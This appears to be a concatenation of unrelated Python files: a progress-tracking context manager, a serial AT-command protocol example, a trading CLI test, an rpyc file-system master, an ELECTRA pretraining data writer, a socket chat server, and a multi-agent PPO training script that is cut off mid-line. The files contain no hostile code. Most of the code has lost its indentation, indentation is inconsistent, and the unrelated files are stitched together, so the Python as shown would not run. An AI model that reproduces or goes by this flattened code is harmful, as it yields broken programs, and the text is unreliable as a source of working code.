_instance = None
def __init__(self, *observers: ProgressObserver):
self._observers = set(observers)
self._state_stack = list()
def add_observer(self, observer: ProgressObserver):
self._observers.add(observer)
def remove_observer(self, observer: ProgressObserver):
self._observers.discard(observer)
def emit_begin(self):
for observer in self._observers:
observer.on_begin(self._state_stack)
def emit_update(self):
for observer in self._observers:
observer.on_update(self._state_stack)
def emit_end(self):
for observer in self._observers:
observer.on_end(self._state_stack)
def begin(self, label: str, total_work: float) -> ProgressState:
super_work = self._state_stack[-1].super_work_ahead \
if self._state_stack else 1
progress_state = ProgressState(label, total_work, super_work)
self._state_stack.append(progress_state)
self.emit_begin()
return progress_state
def end(self, exc_type, exc_value, exc_traceback) -> ProgressState:
exc_info = tuple((exc_type, exc_value, exc_traceback))
progress_state = self._state_stack[-1]
progress_state.exc_info = exc_info if any(exc_info) else None
progress_state.finish()
self.emit_end()
self._state_stack.pop()
if self._state_stack:
self._state_stack[-1].super_work_ahead = 1
return progress_state
def worked(self, work: float):
assert_true(self._state_stack,
'worked() method call is missing a current context')
assert_true(work > 0, 'work must be greater than zero')
for s in reversed(self._state_stack):
s.inc_work(work)
work = s.to_super_work(work)
self.emit_update()
def will_work(self, work: float):
assert_true(self._state_stack,
'will_work() method call is missing a current context')
# noinspection PyProtectedMember
self._state_stack[-1].super_work_ahead = work
@classmethod
def instance(cls) -> '_ProgressContext':
return cls._instance
@classmethod
def set_instance(cls, instance: '_ProgressContext' = None) \
-> '_ProgressContext':
cls._instance, old_instance = \
(instance or _ProgressContext()), cls._instance
return old_instance
_ProgressContext.set_instance()
class new_progress_observers:
"""
Takes zero or more progress observers and activates them in the enclosed context.
Progress observers from an outer context will no longer be active.
:param observers: progress observers that will temporarily replace existing ones.
"""
def __init__(self, *observers: ProgressObserver):
self._observers = observers
self._old_context = None
def __enter__(self):
self._old_context = _ProgressContext.set_instance(
_ProgressContext(*self._observers)
)
def __exit__(self, type, value, traceback):
_ProgressContext.set_instance(self._old_context)
class add_progress_observers:
"""
Takes zero or more progress observers and uses them only in the
enclosed context. Any progress observers from an outer context
remain active.
:param observers: progress observers to be added temporarily.
"""
def __init__(self, *observers: ProgressObserver):
self._observers = observers
def __enter__(self):
for observer in self._observers:
observer.activate()
def __exit__(self, type, value, traceback):
for observer in self._observers:
observer.deactivate()
class observe_progress:
"""
Context manager for observing progress in the enclosed context.
:param label: A label.
:param total_work: The total work.
"""
def __init__(self, label: str, total_work: float):
assert_given(label, 'label')
assert_true(total_work > 0, 'total_work must be greater than zero')
self._label = label
self._total_work = total_work
self._state: Optional[ProgressState] = None
@property
def label(self) -> str:
return self._label
@property
def total_work(self) -> float:
return self._total_work
@property
def state(self) -> ProgressState:
self._assert_used_correctly()
return self._state
def __enter__(self) -> 'observe_progress':
self._state = _ProgressContext.instance().begin(self._label,
self._total_work)
return self
def __exit__(self, type, value, traceback):
_ProgressContext.instance().end(type, value, traceback)
# noinspection PyMethodMayBeStatic
def worked(self, work: float):
self._assert_used_correctly()
_ProgressContext.instance().worked(work)
# noinspection PyMethodMayBeStatic
def will_work(self, work: float):
self._assert_used_correctly()
_ProgressContext.instance().will_work(work)
def _assert_used_correctly(self):
assert_true(self._state is not None,
'observe_progress() must be used with "with" statement')
class observe_dask_progress(dask.callbacks.Callback):
"""
Observe progress made by Dask tasks.
:param label: A label.
:param total_work: The total work.
    :param interval: Time in seconds between progress reports.
:param initial_interval: Time in seconds to wait before progress
is reported.
"""
def __init__(self,
label: str,
total_work: float,
interval: float = 0.1,
initial_interval: float = 0):
super().__init__()
assert_given(label, 'label')
assert_true(total_work > 0, 'total_work must be greater than zero')
self._label = label
self._total_work = total_work
self._state: Optional[ProgressState] = None
self._initial_interval = initial_interval
self._interval = interval
self._last_worked = 0
self._running = False
def __enter__(self) -> 'observe_dask_progress':
super().__enter__()
self._state = _ProgressContext.instance().begin(self._label,
self._total_work)
return self
def __exit__(self, type, value, traceback):
self._stop_thread()
_ProgressContext.instance().end(type, value, traceback)
super().__exit__(type, value, traceback)
# noinspection PyUnusedLocal
def _start(self, dsk):
"""Dask callback implementation."""
self._dask_state = None
self._start_time = time.perf_counter()
# Start background thread
self._running = True
self._timer = threading.Thread(target=self._timer_func)
self._timer.daemon = True
self._timer.start()
# noinspection PyUnusedLocal
def _pretask(self, key, dsk, state):
"""Dask callback implementation."""
self._dask_state = state
# noinspection PyUnusedLocal
def _posttask(self, key, result, dsk, state, worker_id):
"""Dask callback implementation."""
self._update()
# noinspection PyUnusedLocal
def _finish(self, dsk, state, errored):
"""Dask callback implementation."""
self._stop_thread()
elapsed = time.perf_counter() - self._start_time
if elapsed > self._initial_interval:
self._update()
def _timer_func(self):
"""Background thread for updating"""
while self._running:
elapsed = time.perf_counter() - self._start_time
if elapsed > self._initial_interval:
self._update()
time.sleep(self._interval)
def _update(self):
dask_state = self._dask_state
if not dask_state:
return
num_done = len(dask_state['finished'])
num_tasks = num_done + sum(len(dask_state[k])
for k in ['ready', 'waiting', 'running'])
if num_done < num_tasks:
work_fraction = num_done / num_tasks if num_tasks > 0 else 0
worked = work_fraction * self._total_work
work = worked - self._last_worked
if work > 0:
_ProgressContext.instance().worked(work)
self._last_worked = worked
def _stop_thread(self):
if self._running:
self._running = False
self._timer.join()
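

# --- Usage sketch (not part of the original module) ---
# A minimal, hypothetical observer that prints the overall progress, combined
# with a nested observe_progress block. Labels and work amounts are arbitrary.
class _PrintingObserver(ProgressObserver):
    def on_update(self, state_stack: Sequence[ProgressState]):
        root = state_stack[0]
        print('{}: {:.0%}'.format(root.label, root.progress))


if __name__ == '__main__':
    with add_progress_observers(_PrintingObserver()):
        with observe_progress('processing', 4) as reporter:
            reporter.worked(1)        # 25% of the outer block
            reporter.will_work(3)     # the nested block accounts for the rest
            with observe_progress('sub-step', 2) as sub_reporter:
                sub_reporter.worked(1)   # 62.5% overall
                sub_reporter.worked(1)   # 100% overall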
|
at_protocol.py
|
#! /usr/bin/env python
# encoding: utf-8
"""
Example of a AT command protocol.
https://en.wikipedia.org/wiki/Hayes_command_set
http://www.itu.int/rec/T-REC-V.250-200307-I/en
"""
from __future__ import print_function
import sys
sys.path.insert(0, '..')
import logging
import serial
import serial.threaded
import threading
try:
import queue
except ImportError:
import Queue as queue
class ATException(Exception):
pass
class ATProtocol(serial.threaded.LineReader):
TERMINATOR = b'\r\n'
def __init__(self):
super(ATProtocol, self).__init__()
self.alive = True
self.responses = queue.Queue()
self.events = queue.Queue()
self._event_thread = threading.Thread(target=self._run_event)
self._event_thread.daemon = True
self._event_thread.name = 'at-event'
self._event_thread.start()
self.lock = threading.Lock()
def stop(self):
"""
Stop the event processing thread, abort pending commands, if any.
"""
self.alive = False
self.events.put(None)
self.responses.put('<exit>')
def _run_event(self):
"""
Process events in a separate thread so that input thread is not
blocked.
"""
while self.alive:
try:
self.handle_event(self.events.get())
except:
logging.exception('_run_event')
def handle_line(self, line):
"""
Handle input from serial port, check for events.
"""
if line.startswith('+'):
self.events.put(line)
else:
self.responses.put(line)
def handle_event(self, event):
"""
Spontaneous message received.
"""
print('event received:', event)
def command(self, command, response='OK', timeout=5):
"""
Set an AT command and wait for the response.
"""
with self.lock: # ensure that just one thread is sending commands at once
self.write_line(command)
lines = []
while True:
try:
line = self.responses.get(timeout=timeout)
#~ print("%s -> %r" % (command, line))
if line == response:
return lines
else:
lines.append(line)
except queue.Empty:
raise ATException('AT command timeout (%r)' % (command,))
# test
if __name__ == '__main__':
import time
class PAN1322(ATProtocol):
"""
Example communication with PAN1322 BT module.
Some commands do not respond with OK but with a '+...' line. This is
implemented via command_with_event_response and handle_event, because
'+...' lines are also used for real events.
"""
def __init__(self):
super(PAN1322, self).__init__()
self.event_responses = queue.Queue()
self._awaiting_response_for = None
def connection_made(self, transport):
super(PAN1322, self).connection_made(transport)
# our adapter enables the module with RTS=low
self.transport.serial.rts = False
time.sleep(0.3)
self.transport.serial.reset_input_buffer()
def handle_event(self, event):
"""Handle events and command responses starting with '+...'"""
if event.startswith('+RRBDRES') and self._awaiting_response_for.startswith('AT+JRBD'):
rev = event[9:9 + 12]
mac = ':'.join('%02X' % ord(x) for x in rev.decode('hex')[::-1])
self.event_responses.put(mac)
else:
logging.warning('unhandled event: %r' % event)
def command_with_event_response(self, command):
"""Send a command that responds with '+...' line"""
with self.lock: # ensure that just one thread is sending commands at once
self._awaiting_response_for = command
self.transport.write(b'%s\r\n' % (command.encode(self.ENCODING, self.UNICODE_HANDLING),))
response = self.event_responses.get()
self._awaiting_response_for = None
return response
# - - - example commands
def reset(self):
self.command("AT+JRES", response='ROK') # SW-Reset BT module
def get_mac_address(self):
# requests hardware / calibration info as event
return self.command_with_event_response("AT+JRBD")
ser = serial.serial_for_url('spy://COM1', baudrate=115200, timeout=1)
#~ ser = serial.Serial('COM1', baudrate=115200, timeout=1)
with serial.threaded.ReaderThread(ser, PAN1322) as bt_module:
bt_module.reset()
print("reset OK")
print("MAC address is", bt_module.get_mac_address())
|
test_cli.py
|
from threading import Thread
from _thread import interrupt_main
import pytest
import time
from flashcrashed.cli import main, performance
def test_main(patched_bitfinex):
trader, notifier = patched_bitfinex
def wait_sell():
while len(trader.calls) < 2:
time.sleep(0.01)
interrupt_main()
Thread(target=wait_sell).start()
with pytest.raises(SystemExit):
main(['key', 'secret'])
assert trader.calls == [('BUY', 1), ('SELL', 1)]
assert notifier.calls[0][1]['body'].startswith('BTCUSD was BOUGHT'), \
"Incorrect notification message"
assert notifier.calls[1][1]['body'].startswith('BTCUSD was SOLD'), \
"Incorrect notification message"
def test_performance():
with pytest.raises(SystemExit):
performance([])
|
master.py
|
import logging
import math
import os
import pickle
import random
import signal
import sys
import uuid
from time import sleep
from threading import Thread
import rpyc
from rpyc.utils.server import ThreadedServer
from utils import LOG_DIR
from conf import block_size, replication_factor, minions_conf
MASTER_PORT = 2131
# Issue: State related functions may not work correctly after the Master
# definition changed.
def get_state():
return {'file_table': MasterService.exposed_Master.file_table, \
'block_mapping': MasterService.exposed_Master.block_mapping}
def set_state(state):
MasterService.exposed_Master.file_table = state['file_table']
MasterService.exposed_Master.block_mapping = state['block_mapping']
def int_handler(sig, frame):
pickle.dump(get_state(), open('fs.img', 'wb'))
sys.exit(0)
def set_conf():
# load and use conf file, restore from dump if possible.
master = MasterService.exposed_Master
master.block_size = block_size
master.replication_factor = replication_factor
for mid, loc in minions_conf.items():
host, port = loc.split(":")
master.minions[mid] = (host, port)
master.minion_content[mid] = []
assert len(minions_conf) >= master.replication_factor,\
'not enough minions to hold {} replications'.format(\
master.replication_factor)
# if found saved image of master, restore master state.
if os.path.isfile('fs.img'):
set_state(pickle.load(open('fs.img', 'rb')))
logging.info("Current Config:")
logging.info("Block size: %d, replication_faction: %d, minions: %s",
master.block_size, master.replication_factor,
str(master.minions))
class MasterService(rpyc.Service):
class exposed_Master(object):
# Map file_name to block_ids
# {"file_name": [bid1, bid2, bid3]
file_table = {}
# Map block_id to where it's saved
# {"bid": [mid1, mid2, mid3]}
block_mapping = {}
# Map mid to what's saved on it
# {"mid": [bid1, bid2, bid3]}
minion_content = {}
# Register the information of every minion
# TODO: Merge 'minions' and 'minion_content'
minions = {}
block_size = 0
replication_factor = 0
health_monitoring = 0
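        # Illustrative example (hypothetical values) of how the three maps relate after
        # writing "a.txt" as two blocks with replication_factor=2:
        #   file_table     = {"a.txt": [b1, b2]}
        #   block_mapping  = {b1: ["m1", "m2"], b2: ["m2", "m3"]}
        #   minion_content = {"m1": [b1], "m2": [b1, b2], "m3": [b2]}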
def exposed_read(self, fname):
if fname in self.__class__.file_table:
return [(block_id, self.__class__.block_mapping[block_id])
for block_id in self.__class__.file_table[fname]]
return None
def exposed_delete(self, fname):
for block_id in self.__class__.file_table[fname]:
for mid in self.__class__.block_mapping[block_id]:
self.__class__.minion_content[mid].remove(block_id)
del self.__class__.block_mapping[block_id]
del self.__class__.file_table[fname]
def exposed_write(self, dest, size):
if self.exists(dest):
self.wipe(dest)
self.exposed_delete(dest)
self.__class__.file_table[dest] = []
num_blocks = self.calc_num_blocks(size)
blocks = self.alloc_blocks(dest, num_blocks)
return blocks
def exposed_get_block_size(self):
return self.__class__.block_size
def exposed_get_minions(self):
return self.__class__.minions
def exposed_replicate(self, mid):
for block_id in self.__class__.minion_content[mid]:
locations = self.__class__.block_mapping[block_id]
# TODO: Change locations to double linked list
source_mid = random.choice([x for x in locations if x != mid])
target_mid = random.choice([x for x in self.__class__.minions if
x not in locations])
# Replicate block from source to target
self.replicate_block(block_id, source_mid, target_mid)
# Update information registered on Master
self.__class__.block_mapping[block_id].append(target_mid)
self.__class__.minion_content[target_mid].append(block_id)
def exposed_health_report(self):
if not self.__class__.health_monitoring:
Thread(target=self.health_monitor).start()
self.__class__.health_monitoring = 1
return self.health_check()
###############################################################################
# Private functions
###############################################################################
def alloc_blocks(self, dest, num):
blocks = []
for _ in range(num):
block_uuid = uuid.uuid1()
# TODO: Assigning algorithm.
                nodes_ids = random.sample(list(self.__class__.minions.keys()),
self.__class__.replication_factor)
self.__class__.block_mapping[block_uuid] = nodes_ids
for mid in nodes_ids:
self.__class__.minion_content[mid].append(block_uuid)
blocks.append((block_uuid, nodes_ids))
self.__class__.file_table[dest].append(block_uuid)
return blocks
def calc_num_blocks(self, size):
return int(math.ceil(float(size)/self.__class__.block_size))
def minion_lost_handler(self, status):
# TODO
            logging.info('one or more minions dead, status: %s', status)
def health_monitor(self):
            # actively reach out to minions forever
            # SIDE EFFECT: calls minion_lost_handler when any minion is unhealthy
while 1:
minions_status = self.health_check()
if not all(minions_status.values()):
self.minion_lost_handler(minions_status)
sleep(.1)
def health_check(self):
            # reach out to every known minion
            # RETURN {minion_id -> 1 (alive) / 0 (unreachable)}
res = {}
for m, (host, port) in self.__class__.minions.items():
try:
con = rpyc.connect(host, port=port)
minion = con.root.Minion()
res[m] = 1 if minion.ping() == 'pong' else 0
except ConnectionRefusedError:
res[m] = 0
return res
def exists(self, f):
return f in self.__class__.file_table
def replicate_block(self, block_id, source, target):
source_host, source_port = self.__class__.minions[source]
target_host, target_port = self.__class__.minions[target]
con = rpyc.connect(source_host, port=source_port)
minion = con.root.Minion()
minion.replicate(block_id, target_host, target_port)
def wipe(self, fname):
for block_uuid in self.__class__.file_table[fname]:
node_ids = self.__class__.block_mapping[block_uuid]
for m in [self.exposed_get_minions()[_] for _ in node_ids]:
host, port = m
con = rpyc.connect(host, port=port)
minion = con.root.Minion()
minion.delete(block_uuid)
return
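# Illustrative client sketch (hypothetical; not part of the service). It only shows how a
# client could reach the exposed_Master methods over rpyc, mirroring the way the master
# itself talks to minions via con.root.Minion() above.
def _example_client_write(fname, size, host='localhost', port=MASTER_PORT):
    con = rpyc.connect(host, port=port)
    master = con.root.Master()
    # exposed_write returns [(block_id, [minion_id, ...]), ...]; the caller is expected to
    # push each block's data to the listed minions and can look the blocks up again later
    # via master.read(fname).
    return master.write(fname, size)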
if __name__ == "__main__":
logging.basicConfig(filename=os.path.join(LOG_DIR, 'master'),
format='%(asctime)s--%(levelname)s:%(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
level=logging.DEBUG)
set_conf()
signal.signal(signal.SIGINT, int_handler)
    t = ThreadedServer(MasterService, port=MASTER_PORT)
t.start()
|
build_pretraining_dataset.py
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Writes out text data as tfrecords that ELECTRA can be pre-trained on."""
import argparse
import multiprocessing
import os
import random
import time
import tensorflow.compat.v1 as tf
from model import tokenization
from util import utils
def create_int_feature(values):
feature = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return feature
class ExampleBuilder(object):
"""Given a stream of input text, creates pretraining examples."""
def __init__(self, tokenizer, max_length):
self._tokenizer = tokenizer
self._current_sentences = []
self._current_length = 0
self._max_length = max_length
self._target_length = max_length
def add_line(self, line):
"""Adds a line of text to the current example being built."""
line = line.strip().replace("\n", " ")
if (not line) and self._current_length != 0: # empty lines separate docs
return self._create_example()
bert_tokens = self._tokenizer.tokenize(line)
bert_tokids = self._tokenizer.convert_tokens_to_ids(bert_tokens)
self._current_sentences.append(bert_tokids)
self._current_length += len(bert_tokids)
    if self._current_length >= self._target_length:  # the current example has reached its target length
return self._create_example()
return None
def _create_example(self):
"""Creates a pre-training example from the current list of sentences."""
# small chance to only have one segment as in classification tasks
if random.random() < 0.1:
first_segment_target_length = 100000
else:
# -3 due to not yet having [CLS]/[SEP] tokens in the input text
first_segment_target_length = (self._target_length - 3) // 2
first_segment = []
second_segment = []
for sentence in self._current_sentences:
# the sentence goes to the first segment if (1) the first segment is
# empty, (2) the sentence doesn't put the first segment over length or
# (3) 50% of the time when it does put the first segment over length
if (len(first_segment) == 0 or
len(first_segment) + len(sentence) < first_segment_target_length or
(len(second_segment) == 0 and
len(first_segment) < first_segment_target_length and
random.random() < 0.5)):
first_segment += sentence
else:
second_segment += sentence
# trim to max_length while accounting for not-yet-added [CLS]/[SEP] tokens
first_segment = first_segment[:self._max_length - 2]
second_segment = second_segment[:max(0, self._max_length -
len(first_segment) - 3)]
# prepare to start building the next example
self._current_sentences = []
self._current_length = 0
# small chance for random-length instead of max_length-length example
if random.random() < 0.05:
self._target_length = random.randint(5, self._max_length)
else:
self._target_length = self._max_length
return self._make_tf_example(first_segment, second_segment)
def _make_tf_example(self, first_segment, second_segment):
"""Converts two "segments" of text into a tf.train.Example."""
vocab = self._tokenizer.vocab
input_ids = [vocab["[CLS]"]] + first_segment + [vocab["[SEP]"]]
segment_ids = [0] * len(input_ids)
if second_segment:
input_ids += second_segment + [vocab["[SEP]"]]
segment_ids += [1] * (len(second_segment) + 1)
input_mask = [1] * len(input_ids)
input_ids += [0] * (self._max_length - len(input_ids))
input_mask += [0] * (self._max_length - len(input_mask))
segment_ids += [0] * (self._max_length - len(segment_ids))
tf_example = tf.train.Example(features=tf.train.Features(feature={
"input_ids": create_int_feature(input_ids),
"input_mask": create_int_feature(input_mask),
"segment_ids": create_int_feature(segment_ids)
}))
return tf_example
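# A minimal sketch of how ExampleBuilder is driven (hypothetical file names; ExampleWriter
# below is the real consumer):
#
#   builder = ExampleBuilder(tokenizer, max_length=128)
#   with tf.io.TFRecordWriter("out.tfrecord") as writer:
#       for line in tf.io.gfile.GFile("corpus.txt"):
#           example = builder.add_line(line)
#           if example:
#               writer.write(example.SerializeToString())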
class ExampleWriter(object):
"""Writes pre-training examples to disk."""
def __init__(self, job_id, vocab_file, output_dir, max_seq_length,
num_jobs, blanks_separate_docs, do_lower_case,
num_out_files=1000):
self._blanks_separate_docs = blanks_separate_docs
tokenizer = tokenization.KoCharElectraTokenizer(
vocab_file=vocab_file,
do_lower_case=do_lower_case)
self._example_builder = ExampleBuilder(tokenizer, max_seq_length)
self._writers = []
for i in range(num_out_files):
if i % num_jobs == job_id:
output_fname = os.path.join(
output_dir, "pretrain_data.tfrecord-{:}-of-{:}".format(
i, num_out_files))
self._writers.append(tf.io.TFRecordWriter(output_fname))
self.n_written = 0
def write_examples(self, input_file):
"""Writes out examples from the provided input file."""
with tf.io.gfile.GFile(input_file) as f:
for line in f:
# line = line.strip()
if line or self._blanks_separate_docs:
example = self._example_builder.add_line(line)
if example:
self._writers[self.n_written % len(self._writers)].write(
example.SerializeToString())
self.n_written += 1
example = self._example_builder.add_line("")
if example:
self._writers[self.n_written % len(self._writers)].write(
example.SerializeToString())
self.n_written += 1
def finish(self):
for writer in self._writers:
writer.close()
def write_examples(job_id, args):
"""A single process creating and writing out pre-processed examples."""
def log(*args):
msg = " ".join(map(str, args))
print("Job {}:".format(job_id), msg)
log("Creating example writer")
example_writer = ExampleWriter(
job_id=job_id,
vocab_file=args.vocab_file,
output_dir=args.output_dir,
max_seq_length=args.max_seq_length,
num_jobs=args.num_processes,
blanks_separate_docs=args.blanks_separate_docs,
do_lower_case=args.do_lower_case
)
log("Writing tf examples")
fnames = sorted(tf.io.gfile.listdir(args.corpus_dir))
fnames = [f for (i, f) in enumerate(fnames)
if i % args.num_processes == job_id]
random.shuffle(fnames)
start_time = time.time()
for file_no, fname in enumerate(fnames):
if file_no > 0:
elapsed = time.time() - start_time
log("processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
"{:} examples written".format(
file_no, len(fnames), 100.0 * file_no / len(fnames), int(elapsed),
int((len(fnames) - file_no) / (file_no / elapsed)),
example_writer.n_written))
example_writer.write_examples(os.path.join(args.corpus_dir, fname))
example_writer.finish()
log("Done!")
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--corpus-dir", default='../data',
help="Location of pre-training text files.")
parser.add_argument("--vocab-file", default='vocab.txt',
help="Location of vocabulary file.")
parser.add_argument("--output-dir", default='tfrecord_data',
help="Where to write out the tfrecords.")
parser.add_argument("--max-seq-length", default=512, type=int,
help="Number of tokens per example.")
parser.add_argument("--num-processes", default=1, type=int,
help="Parallelize across multiple processes.")
parser.add_argument("--blanks-separate-docs", default=False, type=bool,
help="Whether blank lines indicate document boundaries.")
parser.add_argument("--do-lower-case", dest='do_lower_case',
action='store_true', help="Lower case input text.")
parser.add_argument("--no-lower-case", dest='do_lower_case',
action='store_false', help="Don't lower case input text.")
parser.set_defaults(do_lower_case=False)
args = parser.parse_args()
print(args)
utils.rmkdir(args.output_dir)
if args.num_processes == 1:
write_examples(0, args)
else:
jobs = []
for i in range(args.num_processes):
job = multiprocessing.Process(target=write_examples, args=(i, args))
jobs.append(job)
job.start()
for job in jobs:
job.join()
if __name__ == "__main__":
main()
|
chatServer.py
|
#!/usr/bin/env python3
"""Server for multithreaded (asynchronous) chat application."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
client.send(bytes("Greetings from the cave! Now type your name and press enter!", "utf8"))
addresses[client] = client_address
Thread(target=handle_client, args=(client,)).start()
def handle_client(client): # Takes client socket as argument.
"""Handles a single client connection."""
name = client.recv(BUFSIZ).decode("utf8")
welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % name
client.send(bytes(welcome, "utf8"))
msg = "%s has joined the chat!" % name
broadcast(bytes(msg, "utf8"))
clients[client] = name
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}", "utf8"):
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}", "utf8"))
client.close()
del clients[client]
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
sock.send(bytes(prefix, "utf8")+msg)
clients = {}
addresses = {}
HOST = ''
PORT = 33000
BUFSIZ = 1000000
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
SERVER.bind(ADDR)
if __name__ == "__main__":
SERVER.listen(5)
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
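# Illustrative client sketch (hypothetical; the server above expects the client's name
# first, then free-form messages, and the literal "{quit}" to disconnect):
#
#   from socket import socket, AF_INET, SOCK_STREAM
#   client = socket(AF_INET, SOCK_STREAM)
#   client.connect(('localhost', 33000))
#   client.recv(1024)                              # greeting from the server
#   client.send(bytes("Alice", "utf8"))            # name
#   client.send(bytes("hello everyone", "utf8"))   # broadcast to the room
#   client.send(bytes("{quit}", "utf8"))           # leave the chat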
|
train_policy.py
|
from functools import partial
from typing import Sequence
import os, time, multiprocessing
import torch
from rl import utils
from models.ppo import MultiAgentPPO
from models.networks import ExpertNetwork
from env.scenarios import *
from models.agent import DLAgent
from models.env import Env
import config
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--expert", type=str, default=None)
parser.add_argument("--log_dir", type=str, default=None)
parser.add_argument("--device", type=str, default=None)
parser.add_argument("--rank", type=int, default=None)
parser.add_argument("--master_addr", type=str, default="127.0.0.1")
parser.add_argument("--master_port", type=str, default="29501")
parser.add_argument("--workers", type=int, default=1)
settings = parser.parse_args()
def env_wrapper(expert=None, evaluate=False):
agent_wrapper = partial(DLAgent,
preferred_speed=config.PREFERRED_SPEED, max_speed=config.MAX_SPEED,
radius=config.AGENT_RADIUS, observe_radius=config.NEIGHBORHOOD_RADIUS,
expert=expert
)
if evaluate:
scenario = CircleCrossingScenario(n_agents=20, agent_wrapper=agent_wrapper, min_distance=0.3, radius=4)
else:
kwargs = dict(n_agents=(6, 20), agent_wrapper=agent_wrapper, min_distance=0.3)
scenario = CompositeScenarios([
CircleCrossingScenario(radius=(4, 6), noise=0.5, **kwargs),
SquareCrossingScenario(width=(8, 12), height=(8, 12), vertical=True, horizontal=True, **kwargs),
SquareCrossingScenario(width=(8, 12), height=(8, 12), vertical=True, horizontal=False, **kwargs),
SquareCrossingScenario(width=(8, 12), height=(8, 12), vertical=False, horizontal=True, **kwargs)
])
env = Env(scenario=scenario, fps=1/config.STEP_TIME, timeout=config.TIMEOUT, frame_skip=config.FRAME_SKIP)
return env
def agent_wrapper(env, rank, hooks=[]):
is_chief = rank == 0
is_evaluator = rank < 0
ckpt = os.path.join(settings.log_dir, "ckpt") if settings.log_dir else None
log_dir = settings.log_dir if is_chief or is_evaluator else None
agent = MultiAgentPPO(
actor_learning_rate=config.ACTOR_LR,
critic_learning_rate=config.CRITIC_LR,
entropy_loss_coef=config.ENTROPY_LOSS_COEF,
clip_grad_norm=config.GRAD_NORM_CLIP,
gamma=config.DISCOUNT_FACTOR,
opt_epoch=config.OPT_EPOCHS,
horizon=config.HORIZON,
batch_size=config.BATCH_SIZE,
max_samples=config.MAX_SAMPLES,
init_action_std=config.INIT_ACTION_STD,
checkpoint_file=ckpt,
log_dir=log_dir,
device=settings.device,
is_chief=is_chief,
hooks=[h() for h in hooks]
)
agent.rank = rank
return agent
def train(seed, rank, hooks=[]):
utils.seed(seed)
agent = agent_wrapper(None, rank, hooks)
agent.init()
expert = ExpertNetwork(agent_dim=4, neighbor_dim=4, out_dim=2)
if os.path.isdir(settings.expert):
expert_ckpt = os.path.join(settings.expert, "ckpt")
else:
expert_ckpt = settings.expert
ckpt = torch.load(expert_ckpt, map_location="cpu")
expert.load_state_dict(ckpt["model"])
expert.to(agent.device)
env = env_wrapper(expert)
env.seed(seed)
agent.eval()
done = True
if settings.workers > 0:
print("Worker {} starts work.".format(rank))
while not agent.requests_quit:
if done:
s = env.reset()
else:
s = s_
a, *args = agent.act(s, True)
act = [ag.act(ac, env) for ag, ac in zip(env.agents, a)]
s_, r, done, info = env.step(act)
agent.store(s, a, r, s_, done, info, *args)
if agent.needs_update():
agent.train()
agent.update()
agent.eval()
def evaluate(
seed: int = None,
trials: int = 10,
child_processes: Sequence[multiprocessing.context.Process] = None,
timeout: int = 3600,
keep_best_checkpoint: bool = True
):
env = env_wrapper(evaluate=True)
agent = agent_wrapper(env, rank=-1)
agent.init()
agent.eval()
done = True
tries = -1
best_reward = -999999
finished, global_step = False, -1
total, lifetime, arrived, collided = 0, 0, 0, 0
avg_reward, speed = [], []
while True:
if tries < 0:
last_response_time = time.time()
ckpt = None
while not finished:
if os.path.exists(agent.checkpoint_file):
try:
ckpt = torch.load(agent.checkpoint_file, map_location=agent.device)
except Exception as e:
print("Evaluator Error: ", e)
if ckpt:
agent.load_state_dict(ckpt)
step = agent.global_step.item()
if step <= global_step:
ckpt = None
else:
global_step = step
break
finished = False
if child_processes:
finished = not all(p.is_alive() for p in child_processes)
if not finished and timeout and timeout > 0:
finished = time.time() - last_response_time > timeout
if not finished: time.sleep(30)
if finished: break
tries = 0
utils.env_seed(env, seed)
if done:
s = env.reset()
reward = [[] for _ in range(len(env.agents))]
else:
s = s_
a = agent.act(s, False)[0]
act = [ag.act(ac, env) for ag, ac in zip(env.agents, a)]
s_, rews, done, info = env.step(act)
for idx, (_, r, ag) in enumerate(zip(s, rews, env.agents)):
if _ is not None:
reward[idx].append(r)
speed.append((ag.velocity.x**2 + ag.velocity.y**2)**0.5)
lifetime += 1
tries += done
if done:
arrived += len(info["arrived_agents"])
collided += len(info["collided_agents"])
total += len(env.agents)
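            # Build per-step discounted returns by walking each agent's reward list backwards.
            # Worked example (hypothetical numbers, gamma=0.9): rewards [1, 0, 2] produce
            # returns 2, then 0 + 0.9*2 = 1.8, then 1 + 0.9*1.8 = 2.62, appended in that order.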
rews = []
for r in reward:
rews.append(r[-1])
for _ in reversed(r[:-1]):
rews.append(_ + agent.gamma*rews[-1])
avg_reward.append(sum(rews)/len(rews))
if tries >= trials:
success_rate = arrived/total
collision_rate = collided/total
avg_time = lifetime/total
avg_speed = sum(speed)/len(speed)
avg_reward = sum(avg_reward)/len(avg_reward)
samples = agent.samples.item()
if agent.logger:
agent.logger.add_scalar("eval/success_rate", success_rate, global_step)
agent.logger.add_scalar("eval/collision_rate", collision_rate, global_step)
agent.logger.add_scalar("eval/avg_time", avg_time, global_step)
agent.logger.add_scalar("eval/avg_speed", avg_speed, global_step)
agent.logger.add_scalar("eval/avg_reward", avg_reward, global_step)
agent.logger.add_scalar("model/samples", agent.samples.item(), global_step)
std = agent.actor.log_std.exp().cpu().tolist()
agent.logger.add_scalar("model/std_x", std[0], global_step)
agent.logger.add_scalar("model/std_y", std[1], global_step)
print("[PERFORM] Step: {:.0f}, Collision: {:.2f}, Success: {:.2f}, Reward: {:.2f}, Samples: {:.0f}, {}".format(
